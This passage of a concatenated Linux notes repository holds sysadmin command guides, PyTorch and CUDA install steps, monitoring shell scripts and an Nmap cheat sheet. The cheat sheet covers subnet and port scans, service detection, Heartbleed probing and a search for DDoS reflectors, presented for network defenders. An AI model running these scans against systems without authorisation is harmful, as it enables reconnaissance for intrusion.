| 148 | display free disk space. **-h** option prints out the information in human-readable format. 149 | 150 | ## 14. du 151 | 152 | To retrieve more detailed information about which files use the disk space in a directory, you can use the **du** command. With the **-h** (human-readable) option and the **-s** option for the total size. 153 | 154 | ```sh 155 | $ du -sh /var/log/* 156 | 1.8M /var/log/anaconda 157 | 384K /var/log/audit 158 | 4.0K /var/log/boot.log 159 | 0 /var/log/chrony 160 | 4.0K /var/log/cron 161 | 4.0K /var/log/maillog 162 | 64K /var/log/messages 163 | ``` 164 | 165 | ## 15. id 166 | 167 | To check the user running the application, use the id command to return the user identity. To check your user and group, issue the id command and notice that you are running as the "vagrant" user in the "vagrant" group. 168 | 169 | ```sh 170 | $ yum -y install httpd 171 | Loaded plugins: fastestmirror 172 | You need to be root to perform this command. 173 | $ id 174 | uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 175 | ``` 176 | 177 | ## 16. chmod 178 | 179 | ```sh 180 | $ chmod +x test.sh 181 | [vagrant@localhost ~]$ ls -l 182 | total 4 183 | -rwxrwxr-x. 1 vagrant vagrant 34 Jul 11 02:17 test.sh 184 | ``` 185 | 186 | ## 17. dig/nslookup 187 | 188 | ```sh 189 | $ nslookup mydatabase 190 | Server: 10.0.2.3 191 | Address: 10.0.2.3#53 192 | 193 | ** server can't find mydatabase: NXDOMAIN 194 | ``` 195 | 196 | Using nslookup shows that mydatabase can't be resolved. Trying to resolve with dig yields the same result. 197 | 198 | ```sh 199 | $ dig mydatabase 200 | 201 | ; <<>> DiG 9.9.4-RedHat-9.9.4-50.el7_3.1 <<>> mydatabase 202 | ;; global options: +cmd 203 | ;; connection timed out; no servers could be reached 204 | ``` 205 | 206 | ## 18. iptables 207 | 208 | **iptables** blocks or allows traffic on a Linux host, similar to a network firewall. This tool may prevent certain applications from receiving or transmitting requests. 209 | 210 | ```sh 211 | $ iptables -S 212 | -P INPUT DROP 213 | -P FORWARD DROP 214 | -P OUTPUT DROP 215 | -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT 216 | -A INPUT -i eth0 -p udp -m udp --sport 53 -j ACCEPT 217 | -A OUTPUT -p tcp -m tcp --sport 22 -j ACCEPT 218 | -A OUTPUT -o eth0 -p udp -m udp --dport 53 -j ACCEPT 219 | ``` 220 | 221 | ## 19. sestatus 222 | 223 | You usually find SELinux (a Linux security module) enforced on an application host managed by an enterprise. SELinux provides least-privilege access to processes running on the host, preventing potentially malicious processes from accessing important files on the system. 224 | 225 | ```sh 226 | $ sestatus 227 | SELinux status: enabled 228 | SELinuxfs mount: /sys/fs/selinux 229 | SELinux root directory: /etc/selinux 230 | Loaded policy name: targeted 231 | Current mode: enforcing 232 | Mode from config file: enforcing 233 | Policy MLS status: enabled 234 | Policy deny_unknown status: allowed 235 | Max kernel policy version: 28 236 | ``` 237 | 238 | ## 20. history 239 | 240 | ```sh 241 | $ history 242 | 1 clear 243 | 2 df -h 244 | 3 du 245 | ``` 246 | 247 | 248 | ## Referenc 249 | 250 | - [20 Linux commands every sysadmin should know](https://opensource.com/article/17/7/20-sysadmin-commands) 251 | -------------------------------------------------------------------------------- /linux/basic_command.md: -------------------------------------------------------------------------------- 1 | # Basic Commands 2 | 3 | ### du 4 | estimate file space usage 5 | 6 | ``` 7 | # skip all files and subdirectories ending in .o (including the file .o itself) 8 | $ du --exclude='*.o' 9 | 10 | # summarize disk usage of the top 10 largest files, not including hidden files 11 | $ du -sh * | sort -rh | head -10 12 | 13 | # summarize disk usage of hidden files and directories 14 | $ du -sh .* 15 | ``` 16 | 17 | ### ln 18 | make links between files 19 | 20 | SYNOPSIS: `ln [OPTION] TARGET DIRECTORY` 21 | 22 | - ln, by default, creates a hard link just like *link* does. A *link* is an entry in your file system which connects a filename to the actual bytes of data on disk. What the *link* command does is allow us to manually create a link to file data that already exists. 23 | The important thing to realize is that we did not make a copy of this data. Both filenames point to the same bytes of data on the disk. 24 | 25 | ``` 26 | $ ln file1.txt file2.txt 27 | $ link file1.txt file2.txt 28 | ``` 29 | 30 | - Symbolic links, sometimes called soft links, they link to another link, in this example, 31 | file2.txt points to the link file1.txt, which in turn points to the data of the file. 32 | 33 | ``` 34 | $ ln -s file1.txt file2.txt 35 | ``` 36 | 37 | Note: unlike hard links, removing the file (or directory) that a symlink points to will break the link. 38 | 39 | 40 | ### bc 41 | Hexadecimal or Binary Conversion 42 | 43 | ```sh 44 | # To convert to decimal, set ibase to 16 45 | echo "ibase=16; hex-number"|bc 46 | echo "ibase=16; FFF"|bc 47 | 4095 48 | 49 | # To convert to hexadecimal, set obase to 16 50 | echo "obase=16; decimal-number"|bc 51 | echo "obase=16; 10"|bc 52 | ``` 53 | -------------------------------------------------------------------------------- /linux/compress_extract_files.md: -------------------------------------------------------------------------------- 1 | 2 | ## Compress and Extract Files Using the tar Command on Linux 3 | 4 | ### Compress an Entire Directory or a Single File 5 | 6 | ``` 7 | tar -czvf name-of-archive.tar.gz /path/to/directory-or-file 8 | ``` 9 | 10 | - c: Create an archive. 11 | - z: Compress the archive with gzip. 12 | - v: Display progress in the terminal while creating the archive, also known as “verbose” mode. The v is always optional in these commands, but it’s helpful. 13 | - f: Allows you to specify the filename of the archive. 14 | 15 | 16 | ### Compress Multiple Directories or Files at Once 17 | 18 | ``` 19 | tar -czvf archive.tar.gz /home/ubuntu/Downloads /usr/local/stuff /home/ubuntu/Documents/notes.txt 20 | ``` 21 | 22 | ### Extract an Archive 23 | 24 | 25 | ``` 26 | tar -xzvf archive.tar.gz 27 | ``` 28 | 29 | 30 | Extract the contents of the archive to a specific directory: 31 | 32 | ``` 33 | tar -xzvf archive.tar.gz -C /tmp 34 | ``` 35 | 36 | ## Reference 37 | 38 | - [How to Compress and Extract Files Using the tar Command on Linux](https://www.howtogeek.com/248780/how-to-compress-and-extract-files-using-the-tar-command-on-linux/) -------------------------------------------------------------------------------- /linux/install-pytorch-on-palmetto.md: -------------------------------------------------------------------------------- 1 | 2 | ## Install pytorch on palmetto 3 | 4 | 5 | ### 1. Using conda create command to create a conda environment. 6 | 7 | ``` 8 | $ module add anaconda3/5.1.0 9 | $ module add cuda-toolkit/9.0.176 10 | $ module add cuDNN/9.0v7.3.0 11 | $ conda create -n pytorch python=3.6 12 | $ source activate pytorch 13 | ``` 14 | 15 | If you want to install specific pytorch versions, please follow this [link](https://pytorch.org/get-started/previous-versions/), note that it also needs to add different cuda-toolkit and cuDNN modules to support the pytorch version you installed. For example, install pytorch 1.0.1: 16 | 17 | ``` 18 | pip install torch==1.0.1 torchvision==0.2.2 19 | ``` 20 | 21 | OR 22 | 23 | ``` 24 | conda install pytorch==1.0.1 torchvision==0.2.2 cudatoolkit=9.0 -c pytorch 25 | ``` 26 | 27 | The following steps are for installation from source, if you use the above commands to install, you don't need to run them. 28 | 29 | ### 2. Install torch from source 30 | 31 | ``` 32 | export CXXFLAGS="-std=c++11" 33 | export CFLAGS="-std=c99" 34 | 35 | cd /home/feid/.conda/envs/pytorch/ 36 | git clone https://github.com/torch/distro.git ./torch --recursive 37 | cd ./torch; bash install-deps; 38 | ./install.sh 39 | ``` 40 | 41 | ### 3. Install pytorch from source 42 | 43 | ``` 44 | $export CMAKE_PREFIX_PATH="/home/feid/.conda/envs/pytorch/" # [anaconda root directory] 45 | 46 | Install basic dependencies 47 | 48 | $ conda install numpy pyyaml mkl mkl-include setuptools cmake cffi typing 49 | 50 | Add LAPACK support for the GPU 51 | 52 | $ conda install -c pytorch magma-cuda80 # or magma-cuda90 if CUDA 9 53 | 54 | $ git clone --recursive https://github.com/pytorch/pytorch 55 | 56 | $ cd pytorch 57 | 58 | $ python setup.py install 59 | ``` 60 | 61 | OR Use conda: 62 | 63 | ``` 64 | $ conda install pytorch torchvision -c pytorch 65 | ``` 66 | 67 | 68 | ### 4. Install Warp-CTC bindings 69 | 70 | Note: CUDA_HOME should be like this: `export CUDA_HOME="/software/cuda-toolkit/8.0.44/"` 71 | 72 | Need to activate torch 73 | 74 | ``` 75 | git clone https://github.com/SeanNaren/warp-ctc.git 76 | cd warp-ctc 77 | mkdir build; cd build 78 | cmake .. 79 | make 80 | cd ../pytorch_binding 81 | python setup.py install 82 | 83 | . /home/feid/.conda/envs/pytorch/torch/install/bin/torch-activate 84 | th 85 | ``` 86 | 87 | ### 5. Install pysoundfile 88 | 89 | ``` 90 | conda install cffi numpy 91 | pip install pysoundfile 92 | ``` 93 | -------------------------------------------------------------------------------- /linux/install_cuda10.txt: -------------------------------------------------------------------------------- 1 | 1. Add NVIDIA package repositories 2 | 3 | wget https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64/cuda-repo-ubuntu1804_10.0.130-1_amd64.deb 4 | sudo dpkg -i cuda-repo-ubuntu1804_10.0.130-1_amd64.deb 5 | sudo apt-key adv --fetch-keys https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64/7fa2af80.pub 6 | sudo apt-get update 7 | wget http://developer.download.nvidia.com/compute/machine-learning/repos/ubuntu1804/x86_64/nvidia-machine-learning-repo-ubuntu1804_1.0.0-1_amd64.deb 8 | sudo apt install ./nvidia-machine-learning-repo-ubuntu1804_1.0.0-1_amd64.deb 9 | sudo apt-get update 10 | 11 | 2. Install driver 12 | 13 | sudo add-apt-repository ppa:graphics-drivers 14 | sudo apt-get update 15 | 16 | sudo apt-get install --no-install-recommends nvidia-driver-418 17 | 18 | sudo apt-get install nvidia-kernel-source-430 19 | sudo apt-get install nvidia-kernel-common-430 20 | sudo apt-get install nvidia-driver-430 21 | 22 | 3. Don’t forget to REBOOT 23 | 24 | # Check that GPUs are visible using the command: nvidia-smi 25 | 26 | 4. Install development and runtime libraries (~4GB) 27 | 28 | sudo apt-get install --no-install-recommends \ 29 | cuda-10-0 \ 30 | libcudnn7=7.6.0.64-1+cuda10.0 \ 31 | libcudnn7-dev=7.6.0.64-1+cuda10.0 32 | 33 | 34 | Reference: 35 | 36 | https://www.tensorflow.org/install/gpu 37 | 38 | https://www.videogames.ai/Install-CUDA-10-Ubuntu-18-04-18-10 -------------------------------------------------------------------------------- /linux/nmap-cheat-sheet.md: -------------------------------------------------------------------------------- 1 | Nmap Cheat Sheet 2 | ========== 3 | 4 | 5 | ### Nmap Target Selection 6 | 7 | ```sh 8 | #Scan a single IP 9 | nmap 192.168.1.1 10 | 11 | #Scan a host 12 | nmap www.testhostname.com 13 | 14 | #Scan a range of IPs 15 | nmap 192.168.1.1-20 16 | 17 | #Scan a subnet 18 | nmap 192.168.1.0/24 19 | 20 | #Scan targets from a text file 21 | nmap -iL list-of-ips.txt 22 | ``` 23 | 24 | ### Nmap Port Selection 25 | 26 | ```sh 27 | #Scan a single Port 28 | nmap -p 22 192.168.1.1 29 | 30 | #Scan a range of ports 31 | nmap -p 1-100 192.168.1.1 32 | 33 | #Scan 100 most common ports (Fast) 34 | nmap -F 192.168.1.1 35 | 36 | #Scan all 65535 ports 37 | nmap -p- 192.168.1.1 38 | ``` 39 | 40 | ### Nmap Port Scan types 41 | 42 | ```sh 43 | #Scan using TCP connect 44 | nmap -sT 192.168.1.1 45 | 46 | #Scan using TCP SYN scan (default) 47 | nmap -sS 192.168.1.1 48 | 49 | #Scan UDP ports 50 | nmap -sU -p 123,161,162 192.168.1.1 51 | 52 | #Scan selected ports - ignore discovery 53 | nmap -Pn -F 192.168.1.1 54 | ``` 55 | 56 | ### Service and OS Detection 57 | 58 | ```sh 59 | #Detect OS and Services 60 | nmap -A 192.168.1.1 61 | 62 | #Standard service detection 63 | nmap -sV 192.168.1.1 64 | 65 | #More aggressive Service Detection 66 | nmap -sV --version-intensity 5 192.168.1.1 67 | 68 | #Lighter banner grabbing detection 69 | nmap -sV --version-intensity 0 192.168.1.1 70 | ``` 71 | 72 | ### Nmap Output Formats 73 | 74 | ```sh 75 | #Save default output to file 76 | nmap -oN outputfile.txt 192.168.1.1 77 | 78 | #Save results as XML 79 | nmap -oX outputfile.xml 192.168.1.1 80 | 81 | #Save results in a format for grep 82 | nmap -oG outputfile.txt 192.168.1.1 83 | 84 | #Save in all formats 85 | nmap -oA outputfile 192.168.1.1 86 | ``` 87 | 88 | ### Digging deeper with NSE Scripts 89 | 90 | ```sh 91 | #Scan using default safe scripts 92 | nmap -sV -sC 192.168.1.1 93 | 94 | #Get help for a script 95 | nmap --script-help=ssl-heartbleed 96 | 97 | #Scan using a specific NSE script 98 | nmap -sV -p 443 –script=ssl-heartbleed.nse 192.168.1.1 99 | 100 | #Scan with a set of scripts 101 | nmap -sV --script=smb* 192.168.1.1 102 | ``` 103 | 104 | The option --script-help=$scriptname will display help for the individual scripts. To get an easy list of the installed scripts try locate nse | grep script. 105 | 106 | You will notice I have used the -sV service detection parameter. Generally most NSE scripts will be more effective and you will get better coverage by including service detection. 107 | 108 | **A scan to search for DDOS reflection UDP services** 109 | 110 | ```sh 111 | #Scan for UDP DDOS reflectors 112 | nmap –sU –A –PN –n –pU:19,53,123,161 –script=ntp-monlist,dns-recursion,snmp-sysdescr 192.168.1.0/24 113 | ``` 114 | 115 | UDP based DDOS reflection attacks are a common problem that network defenders come up against. This is a handy Nmap command that will scan a target list for systems with open UDP services that allow these attacks to take place. Full details of the command and the background can be found on the [Sans Institute Blog](https://isc.sans.edu/diary/Using+nmap+to+scan+for+DDOS+reflectors/18193) where it was first posted. 116 | 117 | ### HTTP Service Information 118 | 119 | ```sh 120 | #Gather page titles from HTTP services 121 | nmap --script=http-title 192.168.1.0/24 122 | 123 | #Get HTTP headers of web services 124 | nmap --script=http-headers 192.168.1.0/24 125 | 126 | #Find web apps from known paths 127 | nmap --script=http-enum 192.168.1.0/24 128 | ``` 129 | There are many HTTP information gathering scripts, here are a few that are simple but helpful when examining larger networks. Helps in quickly identifying what the HTTP service is that is running on the open port. Note the http-enum script is particularly noisy. 130 | 131 | ### Detect Heartbleed SSL Vulnerability 132 | 133 | ```sh 134 | #Heartbleed Testing 135 | nmap -sV -p 443 --script=ssl-heartbleed 192.168.1.0/24 136 | ``` 137 | Heartbleed detection is one of the available SSL scripts. It will detect the presence of the well known Heartbleed vulnerability in SSL services. Specify alternative ports to test SSL on mail and other protocols 138 | 139 | **IP Address information** 140 | 141 | ```sh 142 | #Find Information about IP address 143 | nmap --script=asn-query,whois,ip-geolocation-maxmind 192.168.1.0/24 144 | ``` 145 | 146 | Gather information related to the IP address and netblock owner of the IP address. Uses ASN, whois and geoip location lookups. 147 | 148 | ### Reference 149 | 150 | * [Nmap Cheat Sheet](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/) -------------------------------------------------------------------------------- /linux/ping_ok.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # -q quiet 4 | # -c nb of pings to perform 5 | # @Usage 6 | # $ ./ping_ok.sh 7 | 8 | ping -q -c5 facebook.com > /dev/null 9 | 10 | if [ $? -eq 0 ] 11 | then 12 | echo "ok" 13 | fi 14 | -------------------------------------------------------------------------------- /linux/terminal-hotkeys.md: -------------------------------------------------------------------------------- 1 | 2 | # Terminal Hotkeys 3 | 4 | ### 1. 终端快捷键 5 | 6 | 终端下几个常见的快捷键: 7 | 8 | * `ctrl-a`: 移动光标到行首。 9 | * `ctrl-e`: 移动光标到行尾。 10 | * `ctrl-w`: 剪切光标前一个单词(注意是剪切,不是彻底删除,可以通过`ctrl-y`粘贴。 11 | * `ctrl-u`: 剪切光标之前的所有内容,如果光标位于行尾,则相当于剪切整行内容。 12 | * `ctrl-k`: 剪切光标之后的所有内容,有点类似vim的`D`命令。 13 | * `ctrl-y`:粘贴剪切的内容。 14 | * `ctrl-p`、`ctrl-n`:向前/向后查看历史命令,和方向键的UP和Down等价。 15 | * `ctrl-l`: 清屏,相当于执行`clear`命令,注意不会清除当前行内容。 16 | * `ctrl-h`: 向前删除一个字符,相当于回退键。 17 | 18 | 一个典型场景,输了一大串命令A还未执行,发现需要执行另一条命令B,又不想开启一个新的终端,怎么保存当前输入的内容A呢,有两种方式: 19 | 20 | 1. 使用`ctrl-u`剪切整行内容A,执行完B命令后,使用`ctrl-y`恢复,在此之前不能有其它剪切操作,否则内容会被覆盖. 21 | 2. 使用`ctrl-a`移动光标到行首,输入`#`注释当前行内容后直接回车,这相当于注释了当前行,但在history中依然会有记录,恢复时只需要使用`ctrl-p`找到刚刚的命令,去掉`#`即可。 22 | 23 | ### 2. sudo !! 24 | 25 | 主要是利用了shell(bash)的`History Expansion`,我们使用history命令时能够列举执行的历史命令列表: 26 | 27 | ``` 28 | $ history 29 | 1 tar cvf etc.tar /etc/ 30 | 2 cp /etc/passwd /backup 31 | 3 ps -ef | grep http 32 | 4 service sshd restart 33 | 5 /usr/local/apache2/bin/apachectl restart 34 | ``` 35 | 36 | 每个命令前面是命令编号,如果要重复执行某个命令,只需要输入`!`加命令编号即可,比如以上需要再次重启sshd服务,只需要执行: 37 | 38 | ```bash 39 | !4 40 | ``` 41 | 42 | `!`后面如果是负数,则表示执行前第N个命令,比如`!-1`表示执行上一个命令,`!-5`则表示执行倒数第5个命令,执行上一个命令也可以使用`!!`替代,即`!-1`和`!!`是等价的,通常使用`!!`会更便捷。一个典型的场景是执行一条命令时需要root权限,忘记输入`sudo`了,只需要执行以下命令即可: 43 | 44 | ``` 45 | sudo !! 46 | ``` 47 | 48 | 关于bash的History Expansion参考[Linux Bash History Expansion Examples You Should Know](http://www.thegeekstuff.com/2011/08/bash-history-expansion/)。 49 | 50 | ### 3. \^status\^restart\^ 51 | 52 | 我们经常可能需要重复执行上一条命令,但需要修改个别参数,比如我们使用`systemctl`查看nova-compute服务状态: 53 | 54 | ``` 55 | systemctl status openstack-nova-compute 56 | ``` 57 | 58 | 如果我们发现服务异常,紧接下来的操作很可能是想重启下服务,此时只需要执行以下命令即可: 59 | 60 | ``` 61 | ^status^restart^ 62 | ``` 63 | 64 | 以上命令会自动替换为: 65 | 66 | ``` 67 | systemctl restart openstack-nova-compute 68 | ``` 69 | 70 | ### 4. 使用编辑器编辑长命令 71 | 72 | 我们经常遇到需要输入非常长的命令的情况,此时如果在shell里直接输入会特别麻烦,并且不好处理换行情况,此时可以调用本地编辑器编辑命令,输入`ctrl-x` + `ctrl-e`即可。 73 | 74 | -------------------------------------------------------------------------------- /monitor/IO.sh: -------------------------------------------------------------------------------- 1 | #IO.sh 2 | 3 | ## iostat, report CPU statistics and IO statistics for devices, partitions and NFS 4 | ## display a single history since boot report for all CPU and Devices 5 | iostat 6 | 7 | ## display a continuous device report at two second intervals 8 | iostat -d 2 9 | 10 | ## display six reports at two second intervals for all devices 11 | iostat -d 2 6 12 | 13 | 14 | ## print the time for each report displayed 15 | iostat -t 16 | 17 | ## display statistics in megabytes per second 18 | iostat -m 19 | 20 | ## display six reports of extended statistics at two second intervals for devices hda and hdb. 21 | iostat -x hda hdb 2 6 22 | 23 | ## display six reports at two second intervals for device sda and all its partitions (sda1, etc.) 24 | iostat -p sda 2 6 25 | 26 | ## -d, display the device utilization report 27 | ## -x, display extended statistics. 28 | ## -k, display statistics in kilobytes per second instead of blocks per second. 29 | iostat -d -x -k 1 1 30 | 31 | ## report statistics for Linux tasks 32 | pidstat 33 | 34 | ## report IO statistics 35 | pidstat -d 1 36 | 37 | 38 | ## display five reports of CPU statistics for every active task in the system at two second intervals. 39 | pidstat 2 5 40 | 41 | ## display five reports of page faults and memory statistics for PID 1643 at two second intervals. 42 | pidstat -r -p 1643 2 5 43 | 44 | 45 | ## list open files 46 | lsof 47 | ls /proc/pid/fd 48 | 49 | ## collect, report, or save system activity information 50 | ## -d, report activity for each block device 51 | sar -pd 10 3 52 | 53 | # simple top-like IO monitor 54 | iotop 55 | 56 | # report a large amount of valuable information about the system RAM usage. 57 | cat /proc/meminfo 58 | 59 | # /proc/sys/vm/ facilitates the configuration of the Linux kernel's virtual memory (VM) subsystem. 60 | # nr_pdflush_threads, indicates the number of pdflush daemons that are currently running. 61 | cat /proc/sys/vm/nr_pdflush_threads 62 | 63 | # IO Scheduler for a hard disk 64 | # noop anticipatory deadline [cfq] 65 | # cfq: completely fair queuing, an IO scheduler for the Linux kernel and default under many Linux distributions. 66 | # noop: the simplest IO sechduler based upon FIFO queue concept. 67 | # anticipatory, old scheduler which is replaced by cfq. 68 | # deadline: it attempt to guarantee a start service time for a request. 69 | 70 | cat /sys/block/[disk-name]/queue/scheduler 71 | 72 | # to set a specific scheduler, simply type the command as follows: 73 | echo {SCHEDULER-NAME} > /sys/block/{DEVICE-NAME}/queue/scheduler 74 | 75 | # for example, set noop scheduler, enter: 76 | echo noop > /sys/block/hda/queue/scheduler 77 | -------------------------------------------------------------------------------- /monitor/README.md: -------------------------------------------------------------------------------- 1 | monitor script 2 | ========== 3 | 4 | 5 | Common Shell command and monitor script 6 | 7 | ### CPU monitor 8 | 9 | - [CPU](cpu.sh) 10 | 11 | ### Memory monitor 12 | 13 | - [Memory](mem_usage.sh) 14 | 15 | ### Disk management 16 | 17 | - [Disk](disk.sh) 18 | 19 | ### Processes 20 | 21 | - [Process](process.sh) 22 | 23 | ### NetWork 24 | 25 | - [Network](network.sh) 26 | 27 | - [isDDOS](isDDOS.sh) 28 | 29 | - [Nmap Cheat Sheet](../nmap-cheat-sheet.md) 30 | 31 | ### IO 32 | 33 | - [IO](IO.sh) 34 | 35 | ### System 36 | 37 | - [awk](awk.sh) 38 | 39 | - [monitor system](monitor_system.sh) 40 | 41 | - [performance tool](performance_tool.sh) 42 | 43 | 44 | 45 | -------------------------------------------------------------------------------- /monitor/awk.sh: -------------------------------------------------------------------------------- 1 | 2 | # delete duplicate line in temp file 3 | awk '!($0 in array) { array[$0]; print }' temp 4 | 5 | # display 10 frequently used unix commands 6 | awk '{print $1}' ~/.bash_history | sort | uniq -c | sort -rn | head -n 10 7 | 8 | # check the ip list 9 | ifconfig -a | awk '/Bcast/{print $2}' | cut -c 5-19 10 | 11 | # -antu Used to display all information with TCP / UDP only numbers. 12 | netstat -antu | awk '$5 ~ /[0-9]:/{split($5, a, ":"); ips[a[1]]++} END {for (ip in ips) print ips[ip], ip | "sort -k1 -nr"}' 13 | 14 | # display the socket numbers of one process 15 | ps aux | grep [process] | awk '{print $2}' | xargs -I % ls /proc/%/fd | wc -l 16 | 17 | 18 | # display wireless network ip 19 | sudo ifconfig wlan0 | grep inet | awk 'NR==1 {print $2}' | cut -c 6- 20 | 21 | # batch rename 22 | find . -name '*.jpg' | awk 'BEGIN{ a=0 }{ printf "mv %s name%01d.jpg\n", $0, a++ }' | bash 23 | 24 | # display the list of file handles 25 | for x in `ps -u 500 u | grep java | awk '{ print $2 }'`;do ls /proc/$x/fd|wc -l;done 26 | 27 | # sum of the first row 28 | awk '{s+=$1}END{print s}' temp 29 | 30 | # display the most frequently used commands and use times 31 | history | awk '{if ($2 == "sudo") a[$3]++; else a[$2]++}END{for(i in a){print a[i] " " i}}' | sort -rn | head 32 | 33 | # display the file list with the certain timestamp 34 | cp -p `ls -l | awk '/Apr 14/ {print $NF}'` /usr/users/backup_dir 35 | 36 | # print current process information in certain format 37 | ps -ef | awk -v OFS="\n" '{ for (i=8;i<=NF;i++) line = (line ? line FS : "") $i; print NR ":", $1, $2, $7, line, ""; line = "" }' 38 | 39 | # display the single character 40 | echo "abcdefg"|awk 'BEGIN {FS="''"} {print $2}' 41 | 42 | # print record number 43 | ls | awk '{print NR "\t" $0}' 44 | 45 | # print the ssh client 46 | netstat -tn | awk '($4 ~ /:22\s*/) && ($6 ~ /^EST/) {print substr($5, 0, index($5,":"))}' 47 | 48 | # print the first row, which has different values 49 | awk '!array[$1]++' file.txt 50 | 51 | # print the second row, the only value 52 | awk '{ a[$2]++ } END { for (b in a) { print b } }' file 53 | 54 | # display all the system partitions 55 | awk '{if ($NF ~ "^[a-zA-Z].*[0-9]$" && $NF !~ "c[0-9]+d[0-9]+$" && $NF !~ "^loop.*") print "/dev/"$NF}' /proc/partitions 56 | 57 | # display all the primer numbers from 2 through 100 58 | for num in `seq 2 100`;do if [ `factor $num|awk '{print $2}'` == $num ];then echo -n "$num ";fi done;echo 59 | 60 | # display from 3 through records 61 | awk 'NR >= 3 && NR <= 6' /path/to/file 62 | 63 | # display the file in reversed order 64 | awk '{a[i++]=$0} END {for (j=i-1; j>=0;) print a[j--] }' 65 | 66 | # print 9x9 multiplication table 67 | seq 9 | sed 'H;g' | awk -v RS='' '{for(i=1;i<=NF;i++)printf("%dx%d=%d%s", i, NR, i*NR, i==NR?"\n":"\t")}' 68 | -------------------------------------------------------------------------------- /monitor/cpu.sh: -------------------------------------------------------------------------------- 1 | 2 | # limit one process's cpu usage 3 | sudo cpulimit -p pid -l 50 4 | ps -eo %cpu,args | grep -m1 PROCESS | awk '{print $1}' 5 | 6 | # sort the current process according to memory and cpu 7 | ps aux --sort=%mem,%cpu 8 | 9 | # sorting according to cpu usage 10 | ps -e -o pcpu,cpu,nice,state,cputime,args --sort pcpu | sed "/^ 0.0 /d" 11 | 12 | # check the cpu number of current system 13 | grep "processor" /proc/cpuinfo | wc -l 14 | grep -c -e '^cpu[0-9]\+' /proc/stat 15 | 16 | # check the cpu information 17 | cat /proc/cpuinfo 18 | 19 | # check the model name of cpu 20 | grep "model name" /proc/cpuinfo 21 | 22 | # check the system bit is 64 or 32 23 | grep -q '\' /proc/cpuinfo && echo 64 bits || echo 32 bits 24 | getconf LONG_BIT | grep '64' 25 | java -version 26 | 27 | # check the cpu MHz 28 | awk -F": " '/cpu MHz\ */ { print "Processor (or core) running speed is: " $2 }' /proc/cpuinfo ; dmidecode | awk -F": " '/Current Speed/ { print "Processor real speed is: " $2 }' 29 | 30 | # check every process cpu usage each cpu 31 | ps ax -L -o pid,tid,psr,pcpu,args | sort -nr -k4| head -15 | cut -c 1-90 32 | 33 | # check interrupts 34 | cat /proc/interrupts 35 | 36 | # check cpu core numbers 37 | cat /proc/cpuinfo | grep "cpu cores" | uniq | awk -F: '{print $2}' 38 | 39 | # The number of siblings on a processor is the total number of execution units within that processor. 40 | # This will include both additional cores and hyperthreading. 41 | cat /proc/cpuinfo | grep "siblings" 42 | 43 | # The "intr" line gives counts of interrupts serviced since boot time, 44 | # for each of the possible system interrupts. The first column is the total of all interrupts serviced; 45 | # each subsequent column is the total for that particular interrupt. 46 | cat /proc/stat | grep intr 47 | -------------------------------------------------------------------------------- /monitor/disk.sh: -------------------------------------------------------------------------------- 1 | 2 | # Sorting according to size, the first 15 file or directory 3 | du -xB M --max-depth=2 /var | sort -rn | head -n 15 4 | 5 | # list all the sub directory file size 6 | du -h --max-depth=1 7 | 8 | # list the top 10 largest size 9 | du -s * | sort -n | tail 10 | 11 | # according to size of directory 12 | du -b --max-depth 1 | sort -nr | perl -pe 's{([0-9]+)}{sprintf "%.1f%s", $1>=2**30? ($1/2**30, "G"): $1>=2**20? ($1/2**20, "M"): $1>=2**10? ($1/2**10, "K"): ($1, "")}e' 13 | 14 | # list the file tree of the path 15 | du -h /path | sort -h 16 | 17 | # monitor the size of directory every 60s 18 | watch -n60 du /var/log/messages 19 | 20 | # recursive deletion of .svn directory 21 | find . -type d -name '.svn' -print0 | xargs -0 rm -rdf 22 | 23 | # list the disk usage 24 | df -P | column -t 25 | df -h 26 | 27 | # monitor disk usage 28 | watch -d -n 5 df 29 | 30 | # list the inode usage 31 | df -i 32 | 33 | # sort according to every disk usage 34 | df -h | grep -v ^none | ( read header ; echo "$header" ; sort -rn -k 5) 35 | 36 | # check the disk usage 37 | df -x tmpfs | grep -vE "(gvfs|procbususb|rootfs)" 38 | 39 | # check partition usage 40 | fdisk -l /dev/sda 41 | 42 | # show all the partitions 43 | fdisk -l 44 | 45 | # show sectors 46 | fdisk -u 47 | 48 | # show the block number of partition 49 | fdisk -s partition 50 | 51 | # Assessing disk performance with the iostat command 52 | iostat -m -d /dev/sda1 53 | 54 | #hdparm is a command-line utility to set and view ATA and SATA hard disk drive hardware parameters 55 | hdparm -t /dev/sda 56 | 57 | # check all the link of one file 58 | find -L / -samefile /path/to/file -exec ls -ld {} + 59 | 60 | # check the top 5 largest files 61 | find . -type f -exec ls -s {} \; | sort -n -r | head -5 62 | 63 | # check the file 365 ago and delete 64 | find ./ -type f -mtime +365 -exec rm -f {} \; 65 | 66 | # check the files larger than 100M 67 | find . -type f -size +100M 68 | -------------------------------------------------------------------------------- /monitor/isDDOS.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | netstat -antu | awk '$4 ~ /:(22|25|80|2222|443)$/{print $4" "$6}' | sed -n -e '/[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}/p' |sed -n -e '/ESTABLISHED\|SYN/p' |sed 's/::ffff://' |cut -d: -f1 |xargs -n 1 host 2>/dev/null |awk '{if ($NF ~ /NXDOMAIN/) print $2; else print $NF;}' |sort |uniq -c |sort -nr |awk '($1 >= 2){print $1" cons to "$2" on local addr"}'; 4 | 5 | netstat -antu | awk '$5 ~ /:(22|25|80|2222|443)$/{print $5" "$6}' | sed -n -e '/[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}/p' |sed -n -e '/ESTABLISHED\|SYN/p' |sed 's/::ffff://' |cut -d: -f1 |xargs -n 1 host |awk '{if ($NF ~ /NXDOMAIN/) print $2; else print $NF;}' |sort |uniq -c |sort -nr |awk '($1 >= 2){print $1" cons to "$2" on foreign addr"}'; -------------------------------------------------------------------------------- /monitor/mem_usage.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | MemTotal=0 3 | MemAvailable=0 4 | while read name amount unit; do 5 | if [[ $name == "MemTotal:" ]]; then 6 | MemTotal=$amount 7 | elif [[ $name == "MemAvailable:" ]]; then 8 | 